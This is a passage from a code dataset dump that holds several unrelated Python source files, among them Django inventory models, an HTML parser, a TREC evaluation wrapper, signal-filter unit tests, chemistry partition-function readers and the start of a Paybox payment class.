current_month = today.strftime('%Y%m')\n TEXT = ''\n TEXT += '[' + str(today) + ']received token :\\n' + noti.TOKEN + '\\n'\n \n state = Label(window, text = TEXT)\n state.pack()\n\n bot = telepot.Bot(noti.TOKEN)\n\n printMessage(state, TEXT, str(bot.getMe()))\n\n bot.message_loop(handle)\n\n printMessage(state, TEXT, 'Listening...')\n \n window.mainloop()\n \n while 1:\n time.sleep(10)\n\ndef printMessage(label, Str, Message):\n Str += Message + '\\n'\n label.configure(text = Str)","sub_path":"Python_TermProject/Python_TermProject/teller.py","file_name":"teller.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"306922159","text":"from html.parser import HTMLParser\nimport re\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.start_tag = \"\"\n self.end_tag = \"\"\n self.data = []\n self.hashtags = []\n self.metakeywords = []\n\n def handle_starttag(self, tag, attrs):\n self.start_tag = tag\n if tag == \"meta\":\n if len(attrs)>=2 and 'keyword' in attrs[0] and 'content' in attrs[1]:\n keys = self.clean_data(attrs[1][1])\n self.metakeywords.extend(keys.split())\n \n def handle_endtag(self, tag):\n self.end_tag = tag\n\n def handle_data(self, data):\n if self.start_tag == self.end_tag and self.start_tag != \"script\":\n data = self.clean_data(data)\n tags = re.findall(\"(#[A-Za-z0-9_-]+)\", data)\n if tags:\n self.hashtags.extend(tags)\n if data:\n self.data.append(data)\n \n def clean_data(self, data):\n data = data.strip()\n data = re.sub(\"[(){}.,|>'+*~]\", '', data)\n data = re.sub(r'\"', '', data)\n data = re.sub(\"([0-9-]+)\", '', data)\n data = \" \".join(data.split())\n return data","sub_path":"crawler/MyHTMLParser.py","file_name":"MyHTMLParser.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93659212","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Poem\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n# Create your views here.\ndef index(request):\n\tpoems_list = Poem.objects.all()\n\tpaginator = Paginator(poems_list, 15)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpoems = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpoems = paginator.page(1)\n\texcept EmptyPage:\n\t\tpoems = paginator.page(paginator.num_pages)\n\treturn render(request, \"poem/index.html\", {'poems': poems})\n\ndef detail(request, id):\n\tpoem = get_object_or_404(Poem, pk=id)\n\tlines = poem.format_body()\n\tprint(lines)\n\treturn render(request, \"poem/detail.html\", {'poem': poem, 'lines': lines})","sub_path":"poem/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66505253","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom medicplus.models import *\n\n# Create your models here.\n\nstates = (('DRAFT', 'DRAFT'),\n ('VALIDATED', 'VALIDATED'),)\nreceipt_types = (('RC', 'Goods Receipt'),\n ('RT', 'Returns'),\n ('CR', 'Corrections'),\n ('TR', 'Transfers'),)\n\n\nclass Vendor(models.Model):\n name = models.CharField(max_length=100)\n phone = models.CharField(max_length=70)\n address = models.CharField(max_length=70)\n city = models.CharField(max_length=70)\n state = models.CharField(max_length=70)\n country = models.ForeignKey(Countries, on_delete=models.PROTECT)\n location = models.ForeignKey(ServiceCentre, on_delete=models.PROTECT, null=True)\n active = models.BooleanField(default=True)\n\n class Meta:\n db_table = 'vendor'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass drug_lot(models.Model):\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True)\n drug = models.ForeignKey(Drugs, on_delete=models.PROTECT)\n barcode = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=20)\n expiration_date = models.DateField()\n # removal_date = models.DateField()\n active = models.BooleanField(default=True)\n last_changed_by = models.ForeignKey(User, on_delete=models.PROTECT)\n last_changed_at = models.DateField(auto_now=True)\n\n class Meta:\n db_table = 'drug_lot'\n ordering = ['-id']\n\n def __str__(self):\n return self.name\n\n\nclass StockReceipt(models.Model):\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True)\n reference = models.CharField(max_length=50, null=True) # internal ref\n created_by = models.ForeignKey(User, on_delete=models.PROTECT)\n create_date = models.DateTimeField(auto_now_add=True, auto_now=False)\n last_change_by = models.ForeignKey(User, related_name='last_changed_by', on_delete=models.PROTECT, null=True)\n last_changed = models.DateTimeField(auto_now=True, auto_now_add=False) # Changed auto_now_add from True to False\n validated_by = models.ForeignKey(User, related_name='validated_by', on_delete=models.PROTECT, null=True)\n validated_on = models.DateTimeField(auto_now=False, auto_now_add=False, null=True)\n source = models.ForeignKey(ServiceCentre, on_delete=models.DO_NOTHING, null=True, related_name=\"medicplus_warehouse_StockReceipt\")\n location = models.ForeignKey(ServiceCentre, on_delete=models.CASCADE, null=True, related_name=\"medicplus_warehouse_Location\")\n status = models.CharField(max_length=30, choices=states, default='DRAFT')\n receipt_type = models.CharField(max_length=10, choices=receipt_types, null=True)\n parent_id = models.ForeignKey('self', blank=True, null=True, related_name='children', on_delete=models.PROTECT)\n invoiced = models.BooleanField(default=0)\n invoice_number = models.CharField(max_length=200)\n totalCost = models.FloatField(null=True)\n\n class Meta:\n db_table = 'stock_receipt'\n\n def __str__(self):\n try:\n return self.vendor.name\n except:\n return self.source.name\n\n def v_date(self):\n try:\n return self.validated_on.strftime(\"%d/%m/%Y\")\n except:\n pass\n \n def c_date(self):\n try:\n return self.create_date.strftime(\"%d/%m/%Y\")\n except:\n pass\n\n\nclass StockReceiptLine(models.Model):\n drug = models.ForeignKey(Drugs, on_delete=models.PROTECT)\n lot = models.ForeignKey(drug_lot, on_delete=models.PROTECT)\n uom_quantity = models.DecimalField(max_digits=10, decimal_places=2, null=True)\n quantity = models.DecimalField(max_digits=10, decimal_places=2)\n unitPrice = models.DecimalField(max_digits=10, decimal_places=2)\n uomPrice = models.DecimalField(max_digits=10, decimal_places=2, null=True)\n totalValue = models.DecimalField(max_digits=10, decimal_places=2)\n uom = models.ForeignKey('DrugUom', on_delete=models.CASCADE, null=True)\n stockReceipt = models.ForeignKey(StockReceipt, on_delete=models.PROTECT)\n\n class Meta:\n db_table = 'stock_receipt_line'\n\n def __str__(self):\n return self.drug.name\n\n\nclass DrugReceipt(models.Model):\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True)\n drug = models.ForeignKey(Drugs, on_delete=models.PROTECT)\n lot = models.ForeignKey(drug_lot, on_delete=models.PROTECT)\n type = models.CharField(max_length=10, choices=receipt_types)\n stockReceiptLine = models.ForeignKey(StockReceiptLine, on_delete=models.PROTECT)\n source = models.ForeignKey(ServiceCentre, on_delete=models.PROTECT, null=True)\n destination = models.ForeignKey(ServiceCentre, on_delete=models.PROTECT, related_name=\"destination\", null=True)\n quantity = models.FloatField()\n unitPrice = models.FloatField()\n when = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n db_qty = 0\n db_qty2 = 0\n try:\n db_qty = DrugBatch.objects.get(drug_lot=self.lot.id,service_centre_id=self.source.id).quantity\n db_qty2 = DrugBatch.objects.get(drug_lot=self.lot.id,service_centre_id=self.destination.id).quantity\n except:\n pass\n loc1 = self.source.id\n loc2 = self.destination.id\n qty1 = db_qty + (self.quantity * -1)\n qty2 = db_qty2 + self.quantity\n iterate = {loc1: qty1, loc2: qty2}\n\n for x, y in iterate.items():\n params = {'name': self.lot.name, 'quantity': y, 'expiration_date': self.lot.expiration_date,'drug_id':self.drug.id,'unit_price': self.unitPrice}\n updated, created = DrugBatch.objects.update_or_create(defaults=params,drug_lot=self.lot.id, service_centre_id= x)\n \n super(DrugReceipt, self).save(*args, **kwargs)\n\n def when_display(self):\n return self.when.strftime(\"%d/%m/%Y\")\n\n class Meta:\n db_table = 'drug_receipt'\n\n\nclass DrugUomCategory(models.Model):\n name = models.CharField(max_length=50)\n\n class Meta:\n db_table = 'drug_uom_category'\n verbose_name = 'DrugUomCategory'\n verbose_name_plural = 'DrugUomCategories'\n\n def __str__(self):\n return self.name\n\n\nclass DrugUom(models.Model):\n name = models.CharField(max_length=50)\n category = models.ForeignKey(DrugUomCategory, on_delete=models.CASCADE)\n conversion_rate = models.DecimalField(max_digits=10, decimal_places=2)\n drug = models.ForeignKey(Drugs, on_delete=models.CASCADE)\n\n class Meta:\n db_table = 'drug_uom'\n verbose_name = 'DrugUom'\n verbose_name_plural = 'DrugUom'\n\n def __str__(self):\n return self.name\n","sub_path":"medicplus_warehouse/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"532852686","text":"import os\nimport subprocess\nimport sys\n\nfrom pyserini.search import get_qrels\nfrom pyserini.util import download_evaluation_script\n\nscript_path = download_evaluation_script('trec_eval')\ncmd_prefix = ['java', '-jar', script_path]\nargs = sys.argv\nif len(args) > 1:\n cmd = cmd_prefix + args[1:]\n if not os.path.exists(cmd[-2]):\n cmd[-2] = get_qrels(cmd[-2])\nelse:\n cmd = cmd_prefix\nprint(f'Running command: {cmd}')\nprocess = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\nstdout, stderr = process.communicate()\nif stderr:\n print('Results:')\n print(stderr.decode(\"utf-8\"))\nelse:\n print(stdout.decode(\"utf-8\"))\n","sub_path":"pyserini/eval/trec_eval.py","file_name":"trec_eval.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42402725","text":"\n\n\nheight = float(input(\"Height: \"))\nweight = int(input(\"Weight: \"))\n\nif height > 3:\n raise ValueError(\"human height shouldn't be over 3 meters\")\n\nbmi = weight. height ** 2\nprint(bmi)\n\n\n#new index error\nfruits = [\"Apple\", \"Pear\", \"Orange\"]\n\ndef make_pie(index):\n try:\n fruit = fruits[index]\n except IndexError:\n print(\"Fruit pie\")\n else:\n print(fruit + \"pie\")\n \nmake_pie(4)\n","sub_path":"randoms/20210824_BMIraiseError.py","file_name":"20210824_BMIraiseError.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"633087046","text":"\"\"\"\n Read the save filesystem for all of the required information specified by\n (1) the models specified for partition function and\n (2) the electronic structure levels\n in order to write portions of MESS strings for species and reaction paths\n and calculate electronic and zero-point vibrational energies.\n\"\"\"\n\nimport autofile\nfrom routines.pf.models import ene\nfrom routines.pf.models import typ\nfrom routines.pf.models import _rot as rot\nfrom routines.pf.models import _tors as tors\nfrom routines.pf.models import _sym as sym\nfrom routines.pf.models import _vib as vib\nfrom routines.pf.models import _fs as fs\nfrom routines.pf.models import _util as util\nfrom lib.phydat import phycon\n\n\n# General readers\ndef read_spc_data(spc_dct_i, spc_name,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix,\n ref_pf_models=(), ref_pf_levels=()):\n \"\"\" Determines which block writer to use tau\n \"\"\"\n print(('\\n++++++++++++++++++++++++++++++++++++++++++++++++' +\n '++++++++++++++++++++++++++++++++++++++'))\n print('\\nReading filesystem info for {}'.format(spc_name))\n\n vib_model, tors_model = chn_pf_models['vib'], chn_pf_models['tors']\n if typ.is_atom(spc_dct_i):\n inf_dct = atm_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix)\n writer = 'atom_block'\n else:\n if vib_model == 'tau' or tors_model == 'tau':\n inf_dct = tau_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix, saddle=False)\n writer = 'tau_block'\n else:\n inf_dct = mol_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix, saddle=False, tors_wgeo=True)\n writer = 'species_block'\n\n # Add writer to inf dct\n inf_dct['writer'] = writer\n\n return inf_dct\n\n\ndef read_ts_data(spc_dct_i, tsname,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix,\n ts_class, ts_sadpt, ts_nobarrier,\n ref_pf_models=(), ref_pf_levels=()):\n \"\"\" Determine which block function to useset block functions\n \"\"\"\n\n print(('\\n++++++++++++++++++++++++++++++++++++++++++++++++' +\n '++++++++++++++++++++++++++++++++++++++'))\n print('\\nReading filesystem info for {}'.format(tsname))\n\n # Get all of the information for the filesystem\n if not typ.var_radrad(ts_class):\n # Build MESS string for TS at a saddle point\n if ts_nobarrier == 'pst':\n inf_dct = {}\n writer = 'pst_block'\n elif ts_sadpt == 'rpvtst':\n inf_dct = {}\n writer = 'vtst_saddle_block'\n else:\n inf_dct = mol_data(\n spc_dct_i,\n chn_pf_models, chn_pf_levels,\n ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix, saddle=True, tors_wgeo=True)\n writer = 'species_block'\n else:\n # Build MESS string for TS with no saddle point\n if ts_nobarrier == 'pst':\n inf_dct = {}\n writer = 'pst_block'\n elif ts_nobarrier == 'rpvtst':\n inf_dct = {}\n writer = 'vtst_no_saddle_block'\n elif ts_nobarrier == 'vrctst':\n inf_dct = flux_data()\n writer = 'vrctst_block'\n\n # Add writer to inf dct\n inf_dct['writer'] = writer\n\n return inf_dct\n\n\n# Data Readers\ndef atm_data(spc_dct_i,\n chn_pf_models, chn_pf_levels, ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix):\n \"\"\" Pull all neccessary info for the atom\n \"\"\"\n\n # Set up all the filesystem objects using models and levels\n pf_filesystems = fs.pf_filesys(\n spc_dct_i, chn_pf_levels, run_prefix, save_prefix, False)\n\n print('\\nObtaining the geometry...')\n geom = rot.read_geom(pf_filesystems)\n\n print('\\nObtaining the electronic energy...')\n ene_chnlvl = ene.read_energy(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n read_ene=True, read_zpe=False)\n\n ene_reflvl = None\n _, _ = ref_pf_models, ref_pf_levels\n zpe_chnlvl = None\n\n # Create info dictionary\n inf_dct = {\n 'geom': geom,\n 'sym_factor': 1.0,\n 'freqs': [],\n 'mess_hr_str': '',\n 'mass': util.atom_mass(spc_dct_i),\n 'elec_levels': spc_dct_i['elec_levels'],\n 'ene_chnlvl': ene_chnlvl,\n 'ene_reflvl': ene_reflvl,\n 'zpe_chnlvl': zpe_chnlvl\n }\n\n return inf_dct\n\n\ndef mol_data(spc_dct_i,\n chn_pf_models, chn_pf_levels, ref_pf_models, ref_pf_levels,\n run_prefix, save_prefix, saddle=False, tors_wgeo=True):\n \"\"\" Pull all of the neccessary information from the filesystem for a species\n \"\"\"\n\n # Initialize all of the elements of the inf dct\n geom, sym_factor, freqs, imag, elec_levels = None, None, None, None, None\n allr_str, mdhr_dat = '', ''\n xmat, rovib_coups, rot_dists = None, None, None\n\n # Set up all the filesystem objects using models and levels\n pf_filesystems = fs.pf_filesys(\n spc_dct_i, chn_pf_levels, run_prefix, save_prefix, saddle)\n\n # Set information for transition states\n frm_bnd_keys, brk_bnd_keys = util.get_bnd_keys(pf_filesystems, saddle)\n rxn_class = util.set_rxn_class(spc_dct_i, saddle)\n\n # Obtain rotor information used to determine new information\n print('\\nPreparing internal rotor info building partition functions...')\n rotors = tors.build_rotors(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n rxn_class=rxn_class,\n frm_bnd_keys=frm_bnd_keys, brk_bnd_keys=brk_bnd_keys,\n tors_geo=tors_wgeo)\n\n if typ.nonrigid_tors(chn_pf_models, rotors):\n run_path = fs.make_run_path(pf_filesystems, 'tors')\n tors_strs = tors.make_hr_strings(\n rotors, run_path, chn_pf_models['tors'])\n [allr_str, hr_str, _, prot_str, mdhr_dat] = tors_strs\n\n # Obtain rotation partition function information\n print('\\nObtaining info for rotation partition function...')\n geom = rot.read_geom(pf_filesystems)\n\n if typ.nonrigid_rotations(chn_pf_models):\n rovib_coups, rot_dists = rot.read_rotational_values(pf_filesystems)\n\n # Obtain vibration partition function information\n print('\\nObtaining the vibrational frequencies and zpves...')\n if typ.nonrigid_tors(chn_pf_models, rotors):\n freqs, imag, zpe, _ = vib.tors_projected_freqs_zpe(\n pf_filesystems, hr_str, prot_str, saddle=saddle)\n if 'mdhrv' in chn_pf_models['tors']:\n freqs = ()\n else:\n freqs, imag, zpe = vib.read_harmonic_freqs(\n pf_filesystems, saddle=saddle)\n\n if typ.anharm_vib(chn_pf_models):\n xmat = vib.read_anharmon_matrix(pf_filesystems)\n\n # Obtain symmetry factor\n print('\\nDetermining the symmetry factor...')\n sym_factor = sym.symmetry_factor(\n pf_filesystems, chn_pf_models, spc_dct_i, rotors,\n frm_bnd_keys=frm_bnd_keys, brk_bnd_keys=brk_bnd_keys)\n\n # Obtain electronic energy levels\n elec_levels = spc_dct_i['elec_levels']\n\n # Obtain energy levels\n print('\\nObtaining the electronic energy...')\n chn_ene = ene.read_energy(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n read_ene=True, read_zpe=False)\n ene_chnlvl = chn_ene + zpe\n\n ene_reflvl = None\n _, _ = ref_pf_models, ref_pf_levels\n # if chn_model == ref_model:\n # ene_reflvl = ene_chnlvl\n # else:\n # ene_reflvl = get_fs_ene_zpe(spc_dct, prod,\n # thy_dct, model_dct, model,\n # save_prefix, saddle=False,\n # read_ene=True, read_zpe=True)\n\n # Create info dictionary\n keys = ['geom', 'sym_factor', 'freqs', 'imag', 'elec_levels',\n 'mess_hr_str', 'mdhr_dat',\n 'xmat', 'rovib_coups', 'rot_dists',\n 'ene_chnlvl', 'ene_reflvl', 'zpe_chnlvl']\n vals = [geom, sym_factor, freqs, imag, elec_levels,\n allr_str, mdhr_dat,\n xmat, rovib_coups, rot_dists,\n ene_chnlvl, ene_reflvl, zpe]\n inf_dct = dict(zip(keys, vals))\n\n return inf_dct\n\n\n# VRCTST\n# def flux_data(spc_dct_i,\n# chn_pf_models, chn_pf_levels,\n# run_prefix, save_prefix):\ndef flux_data():\n \"\"\" Grab the flux file from the filesystem\n \"\"\"\n\n # # Set filesys\n # ts_save_fs, ts_save_path = _ts_filesys(\n # spc_dct, rxn, pf_levels, save_prefix, level='harm')\n\n # # Read the flux file string\n # locs = []\n # flux_str = ts_save_fs[-1].file.flux.read(locs)\n flux_str = 'FLUX STR'\n\n # Create info dictionary\n inf_dct = {'flux_str': flux_str}\n\n return inf_dct\n\n\n# VTST\n# def rpvtst_data(rpath_vals, sadpt=True):\n# \"\"\" Pull all of the neccessary information from the\n# filesystem for a species\n# \"\"\"\n# # Set filesys\n# if sadpt:\n# _, cnf_save_path, _, _ = _cnf_filesys(\n# spc_dct_i, rxn, pf_levels, save_prefix,\n# saddle=saddle, level='harm')\n# scn_save_fs, scn_locs, save_paths = _scn_filesys(\n# cnf_save_path, run_tors_names)\n# else:\n# ts_save_fs, ts_save_path = _ts_filesys(\n# spc_dct, rxn, pf_levels, save_prefix, level='harm')\n# scn_save_fs, scn_locs, save_paths = _scn_filesys(\n# ts_save_path, run_tors_names)\n#\n# # Loop over scan filesystem and pull out the values\n# inf_dct_lst = []\n# for locs in scn_locs:\n#\n# # Check if to pull info\n# if locs not in rpath_vals:\n# continue\n#\n# # Get geometry, energy, vibrational freqs, and zpe\n# if scn_save_fs[-1].file.geometry.exists(locs):\n# geom = scn_save_fs[-1].file.geometry.read(locs)\n# else:\n# print('no geom')\n# continue\n# if scn_save_fs[-1].file.energy.exists(locs):\n# sp_save_fs = autofile.fs.single_point(scn_save_path)\n# sp_level = fsorb.mod_orb_restrict(ts_info, ene_thy_level)\n# if sp_save_fs[-1].file.energy.exists(sp_level[1:4]):\n# ene = sp_save_fs[-1].file.energy.read(sp_level[1:4])\n# else:\n# print('no energy')\n# continue\n# else:\n# print('no energy')\n# continue\n# if scn_save_fs[-1].file.hessian.exists(locs):\n# proj_rotors_str = ''\n# hess = scn_save_fs[-1].file.hessian.read(locs)\n# scn_save_path = scn_save_fs[-1].path(locs)\n# freqs, _, _ = vib.projrot_freqs_1(\n# geom, hess,\n# proj_rotors_str,\n# scn_save_path, pot=False, saddle=True)\n# zpe = sum(freqs)*phycon.WAVEN2KCAL/2.\n# else:\n# print('no hessian')\n# continue\n#\n# # Get the relative energy\n# zero_ene = ''\n#\n# # Create info dictionary and append to lst\n# sym_factor = 1.0\n# elec_levels = ts_dct['elec_levels']\n# keys = ['geom', 'sym_factor', 'freqs', 'elec_levels', 'zero_ene']\n# vals = [geom, sym_factor, freqs, elec_levels, zero_ene]\n# inf_dct_lst.append(dict(zip(keys, vals)))\n#\n# return inf_dct_lst\n\n\n# TAU\ndef tau_data(spc_dct_i,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix, saddle=False):\n \"\"\" Read the filesystem to get information for TAU\n \"\"\"\n\n frm_bnd_keys = ()\n brk_bnd_keys = ()\n\n # Set up all the filesystem objects using models and levels\n pf_filesystems = fs.pf_filesys(\n spc_dct_i, chn_pf_levels, run_prefix, save_prefix, saddle)\n [harm_cnf_fs, _,\n harm_min_locs, harm_save, _] = pf_filesystems['harm']\n # [tors_cnf_fs, _, tors_min_locs, _, _] = pf_filesystems['tors']\n\n # Get the conformer filesys for the reference geom and energy\n if harm_min_locs:\n geom = harm_cnf_fs[-1].file.geometry.read(harm_min_locs)\n min_ene = harm_cnf_fs[-1].file.energy.read(harm_min_locs)\n\n # Set the filesystem\n tau_save_fs = autofile.fs.tau(harm_save)\n\n # Set the ground and reference energy to set values for now\n rxn_class = None\n\n # Get the rotor info\n rotors = tors.build_rotors(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n rxn_class=rxn_class,\n frm_bnd_keys=frm_bnd_keys, brk_bnd_keys=brk_bnd_keys,\n tors_geo=True)\n\n run_path = fs.make_run_path(pf_filesystems, 'tors')\n tors_strs = tors.make_hr_strings(\n rotors, run_path, chn_pf_models['tors'])\n [_, hr_str, flux_str, prot_str, _] = tors_strs\n\n # Use model to determine whether to read grads and hessians\n vib_model = chn_pf_models['vib']\n freqs = ()\n _, _, proj_zpve, harm_zpve = vib.tors_projected_freqs_zpe(\n pf_filesystems, hr_str, prot_str, saddle=False)\n zpe_chnlvl = proj_zpve * phycon.EH2KCAL\n\n # Set reference energy to harmonic zpve\n reference_energy = harm_zpve * phycon.EH2KCAL\n if vib_model == 'tau':\n tau_locs = [locs for locs in tau_save_fs[-1].existing()\n if tau_save_fs[-1].file.hessian.exists(locs)]\n else:\n tau_locs = tau_save_fs[-1].existing()\n\n # Read the geom, ene, grad, and hessian for each sample\n samp_geoms, samp_enes, samp_grads, samp_hessians = [], [], [], []\n for locs in tau_locs:\n\n # print('Reading tau info at path {}'.format(\n # tau_save_fs[-1].path(locs)))\n\n geo = tau_save_fs[-1].file.geometry.read(locs)\n geo_str = autofile.data_types.swrite.geometry(geo)\n samp_geoms.append(geo_str)\n\n tau_ene = tau_save_fs[-1].file.energy.read(locs)\n rel_ene = (tau_ene - min_ene) * phycon.EH2KCAL\n ene_str = autofile.data_types.swrite.energy(rel_ene)\n samp_enes.append(ene_str)\n\n if vib_model == 'tau':\n grad = tau_save_fs[-1].file.gradient.read(locs)\n grad_str = autofile.data_types.swrite.gradient(grad)\n samp_grads.append(grad_str)\n\n hess = tau_save_fs[-1].file.hessian.read(locs)\n hess_str = autofile.data_types.swrite.hessian(hess)\n samp_hessians.append(hess_str)\n\n # Read a geometry, grad, and hessian for a reference geom if needed\n ref_geom, ref_grad, ref_hessian = [], [], []\n if vib_model != 'tau':\n\n # Get harmonic filesystem information\n [harm_save_fs, _, harm_min_locs, _, _] = pf_filesystems['harm']\n\n # Read the geometr, gradient, and Hessian\n geo = harm_save_fs[-1].file.geometry.read(harm_min_locs)\n geo_str = autofile.data_types.swrite.geometry(geo)\n ref_geom.append(geo_str)\n\n grad = harm_save_fs[-1].file.gradient.read(harm_min_locs)\n grad_str = autofile.data_types.swrite.gradient(grad)\n ref_grad.append(grad_str)\n\n hess = harm_save_fs[-1].file.hessian.read(harm_min_locs)\n hess_str = autofile.data_types.swrite.hessian(hess)\n ref_hessian.append(hess_str)\n\n # Obtain symmetry factor\n print('\\nDetermining the symmetry factor...')\n sym_factor = sym.symmetry_factor(\n pf_filesystems, chn_pf_models, spc_dct_i, rotors,\n frm_bnd_keys=(), brk_bnd_keys=())\n\n # Create info dictionary\n keys = ['geom', 'sym_factor', 'elec_levels', 'freqs', 'flux_mode_str',\n 'samp_geoms', 'samp_enes', 'samp_grads', 'samp_hessians',\n 'ref_geom', 'ref_grad', 'ref_hessian',\n 'zpe_chnlvl', 'reference_energy']\n vals = [geom, sym_factor, spc_dct_i['elec_levels'], freqs, flux_str,\n samp_geoms, samp_enes, samp_grads, samp_hessians,\n ref_geom, ref_grad, ref_hessian,\n zpe_chnlvl, reference_energy]\n inf_dct = dict(zip(keys, vals))\n\n return inf_dct\n","sub_path":"routines/pf/models/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":15981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"520937283","text":"#!/usr/bin/env python\n# coding=utf-8\nimport pkg_resources\npkg_resources.declare_namespace(__name__)\nversion = pkg_resources.require('graf')[0].version\n\n__all__ = ['version', 'use', 'call']\n\ndef use(environment=None):\n \"\"\"\n Use graf commands in the shell\n\n Args:\n environment: None or a dictionary instance which indicate the variables.\n if this is not specified, globals() of caller will be used.\n \"\"\"\n from graf.plugins import registry\n if not environment:\n import inspect\n frame = inspect.stack()[1][0]\n environment = frame.f_globals\n environment.update(registry.raw)\n\n\ndef call(filename, environment=None):\n \"\"\"\n Call graf script file in this shell\n\n Args:\n filename: a filename of graf script file\n environment: None or a dictionary instance which indicate the variables.\n if this is not specified, globals() of caller will be used.\n \"\"\"\n import os\n import sys\n from graf.plugins import registry\n\n if not environment:\n import inspect\n frame = inspect.stack()[1][0]\n environment = frame.f_globals\n\n # create global variables\n local = environment.copy()\n #local.update(locals())\n local.update(registry.raw)\n\n # call script file\n local['__file__'] = filename\n local['__name__'] = '__main__'\n local['__package__'] = None\n\n # Opne file and read content\n with open(filename, 'r') as f: content = f.read()\n # Add directory of filename into PYTHONPATH\n python_path_stored = sys.path\n sys.path = [os.path.dirname(filename)] + sys.path\n # execute\n execfile(filename, local)\n # Remove directory from PYTHONPATH\n sys.path = python_path_stored\n","sub_path":"graf/src/graf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"130603902","text":"import unittest\r\nimport filterdesigner.FilterSpec as FilterSpec\r\nimport filterdesigner.FIRDesign as FIRDesign\r\nimport filterdesigner.IIRDesign as IIRDesign\r\nimport scipy.signal as signal\r\nimport numpy as np\r\n\r\nclass TestImpz(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.order = 80\r\n self.cut = 0.5\r\n self.fc = 300\r\n self.fs = 1000\r\n self.n = 1000\r\n\r\n def test_impz_1(self):\r\n # Test case for FIR filter without n\r\n fil = FIRDesign.fir1(self.order, self.cut)\r\n _, yout = FilterSpec.impz(fil)\r\n self.assertTrue(np.all(yout == fil[0]))\r\n\r\n def test_impz_2(self):\r\n # Test case for FIR filter with n\r\n fil = FIRDesign.fir1(self.order, self.cut)\r\n T = np.arange(0, self.n, 1)\r\n x = np.zeros(len(T))\r\n x[0] = 1\r\n yout = signal.lfilter(fil[0], fil[1], x)\r\n tt, y = FilterSpec.impz(fil, n=self.n)\r\n self.assertTrue(np.all(tt == T) and np.all(y == yout))\r\n\r\n def test_impz_3(self):\r\n # Test case for IIR filter without n\r\n fil = IIRDesign.butter(6, self.fc/(self.fs/2))\r\n dl = signal.dlti(fil[0], fil[1], dt=1/self.fs)\r\n i_d = signal.dimpulse(dl)\r\n T = i_d[0]\r\n yout = i_d[1][0]\r\n tt, y = FilterSpec.impz(fil, fs=self.fs)\r\n self.assertTrue(np.all(tt == T) and np.all(y == yout))\r\n \r\n def test_impz_4(self):\r\n # Test case for IIR filter with n\r\n fil = IIRDesign.butter(6, self.fc/(self.fs/2))\r\n dl = signal.dlti(fil[0], fil[1], dt=1/self.fs)\r\n i_d = signal.dimpulse(dl, n=self.n)\r\n T = i_d[0]\r\n yout = i_d[1][0]\r\n tt, y = FilterSpec.impz(fil, n=self.n, fs=self.fs)\r\n self.assertTrue(np.all(tt == T) and np.all(y == yout))\r\n","sub_path":"filterdesigner/tests/test_impz.py","file_name":"test_impz.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321627141","text":"import base64\nimport binascii\nimport datetime\nimport hashlib\nimport hmac\nfrom urllib.parse import parse_qs, urlparse\n\nimport requests\n\nfrom .exceptions import InvalidParametersException, PayboxEndpointException\nfrom Crypto.Hash import SHA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5\nfrom django.conf import settings\n\n\nclass PayboxSystemTransaction:\n \"\"\"A Paybox System transaction, from your server to the customer's browser, and from Paybox server to yours\n Attributes:\n REQUIRED The values nedded to call for a payment\n OPTIONAL The values you may add to modify Paybox behavior\n RESPONSE_CODES Every response code Paybox may return after a payment attempt\n \"\"\"\n\n def __init__(\n self,\n production=False,\n total=None,\n cmd=None,\n porteur=None,\n time=None,\n repondre_a=None,\n refuse=None,\n effectue=None,\n annule=None,\n attente=None,\n langue=None,\n hash=None,\n devise=None,\n 